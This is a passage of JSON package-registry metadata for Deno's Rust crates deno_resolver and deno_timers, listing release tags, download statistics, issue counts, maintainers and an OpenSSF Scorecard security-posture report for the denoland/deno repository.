ags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-23T02:05:41.529Z","dependent_packages_count":0,"downloads":534871,"downloads_period":"total","dependent_repos_count":0,"rankings":{"downloads":96.39774052925645,"dependent_repos_count":25.31344016700436,"dependent_packages_count":33.56849020691349,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":51.7598903010581},"purl":"pkg:cargo/deno_resolver","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/deno_resolver","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/cargo/deno_resolver","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/deno_resolver/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-22T15:36:05.774Z","issues_count":6593,"pull_requests_count":9606,"avg_time_to_close_issue":17240482.91906903,"avg_time_to_close_pull_request":1537756.603103103,"issues_closed_count":3779,"pull_requests_closed_count":7991,"pull_request_authors_count":571,"issue_authors_count":2462,"avg_comments_per_issue":2.5116032155316246,"avg_comments_per_pull_request":0.7158026233603998,"merged_pull_requests_count":6976,"bot_issues_count":0,"bot_pull_requests_count":47,"past_year_issues_count":659,"past_year_pull_requests_count":1189,"past_year_avg_time_to_close_issue":1375932.5787037036,"past_year_avg_time_to_close_pull_request":1325136.485893417,"past_year_issues_closed_count":216,"past_year_pull_requests_closed_count":638,"past_year_pull_request_authors_count":177,"past_year_issue_authors_count":370,"past_year_avg_comments_per_issue":1.2109256449165402,"past_year_avg_comments_per_pull_request":1.07905803195963,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":16,"past_year_merged_pull_requests_count":468,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1779,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":673,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":288,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":281,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":377,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":187,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"dsherret","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"crowlKats","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"devsnek","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"ry","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_resolver/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_resolver/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_resolver/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_resolver/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_resolver/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_resolver/codemeta","maintainers":[{"uuid":"91327","login":"bartlomieju","name":"Bartek Iwańczuk","email":null,"url":"https://github.com/bartlomieju","packages_count":116,"html_url":"https://crates.io/users/bartlomieju","role":null,"created_at":"2024-09-29T18:44:15.156Z","updated_at":"2024-09-29T18:44:15.156Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/bartlomieju/packages"},{"uuid":"221986","login":"denobot","name":null,"email":null,"url":"https://github.com/denobot","packages_count":106,"html_url":"https://crates.io/users/denobot","role":null,"created_at":"2024-09-29T18:44:15.953Z","updated_at":"2024-09-29T18:44:15.953Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/denobot/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":338199,"maintainers_count":71476,"namespaces_count":0,"keywords_count":71845,"github":"rust-lang","metadata":{"funded_packages_count":30558,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-04T05:05:22.166Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":4047482,"name":"deno_timers","ecosystem":"cargo","description":"Timers API implementation for Deno","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":35,"first_release_published_at":"2021-04-14T13:33:59.000Z","latest_release_published_at":"2022-02-03T22:47:38.076Z","latest_release_number":"0.34.0","last_synced_at":"2026-09-07T22:57:40.498Z","created_at":"2022-04-12T10:01:07.323Z","updated_at":"2026-09-07T22:57:40.498Z","registry_url":"https://crates.io/crates/deno_timers/","install_command":"cargo install deno_timers","documentation_url":"https://docs.rs/deno_timers/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-29T19:17:00.000Z","size":248743,"stargazers_count":108340,"open_issues_count":1540,"forks_count":6359,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-29T21:56:41.390Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-29T20:05:41.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: 